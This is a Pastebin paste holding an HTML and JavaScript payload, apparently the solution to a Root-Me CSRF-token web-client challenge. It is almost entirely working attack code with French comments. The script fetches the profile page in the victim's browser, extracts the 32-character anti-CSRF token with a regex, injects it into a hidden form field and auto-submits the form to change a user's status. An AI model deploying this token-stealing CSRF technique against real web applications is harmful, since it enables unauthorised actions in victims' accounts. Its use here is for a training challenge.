Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="post" name="csrf_form" enctype="multipart/form-data">
- <input id="username" type="text" name="username" value="ahmed">
- <input id="status" type="checkbox" name="status" checked >
- <input id="token" type="hidden" name="token" value="" />
- <button type="submit">Submit</button>
- </form>
- <script>
- xhttp = new XMLHttpRequest();
- xhttp.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile", false);
- xhttp.send();
- // extraction du token
- token_admin = (xhttp.responseText.match(/[abcdef0123456789]{32}/));
- // insertion du token dans notre formulaire
- document.getElementById('token').setAttribute('value', token_admin)
- // envoi du formulaire
- document.csrf_form.submit();
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement